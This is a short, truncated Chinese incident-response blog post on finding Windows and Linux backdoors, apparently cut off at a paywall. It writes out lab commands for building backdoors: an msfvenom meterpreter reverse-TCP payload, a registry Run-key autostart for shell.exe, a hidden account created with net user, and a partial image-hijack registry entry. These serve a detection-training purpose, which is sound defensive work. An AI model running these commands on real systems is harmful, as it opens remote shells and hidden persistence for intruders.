Windows-后门-常规&权限维持&内存马
Linux-后门-常规&权限维持&Rootkit&内存马

Windows实验
1、常规MSF后门-分析检测
2、权限维持后门-分析检测
3、Web程序内存马-分析检测
常见工具集合:
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6666 -f exe -o shell.exe
自启动测试:
REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /V “backdoor” /t REG_SZ /F /D “C:\shell.exe”
隐藏账户:
net user xiaodi$ xiaodi!@#X123 /add
映像劫持
REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe” /v deb
本文介绍了如何进行Windows和Linux系统的后门排查,包括常规MSF后门、权限维持、Rootkit、内存马的检测。通过实验演示了不同类型的后门创建与分析,如Windows的自启动、隐藏账户、映像劫持等,以及Linux的GScan和rkhunter工具的使用。同时,还涉及Web层面的后门检查,涵盖PHP、.NET、JAVA和Python的内存马检测。
订阅专栏 解锁全文
:应急响应之不同平台后门排查思路&spm=1001.2101.3001.5002&articleId=139215177&d=1&t=3&u=f94822c1a4904f9da92e8d2a354053c1)

被折叠的 条评论
为什么被折叠?



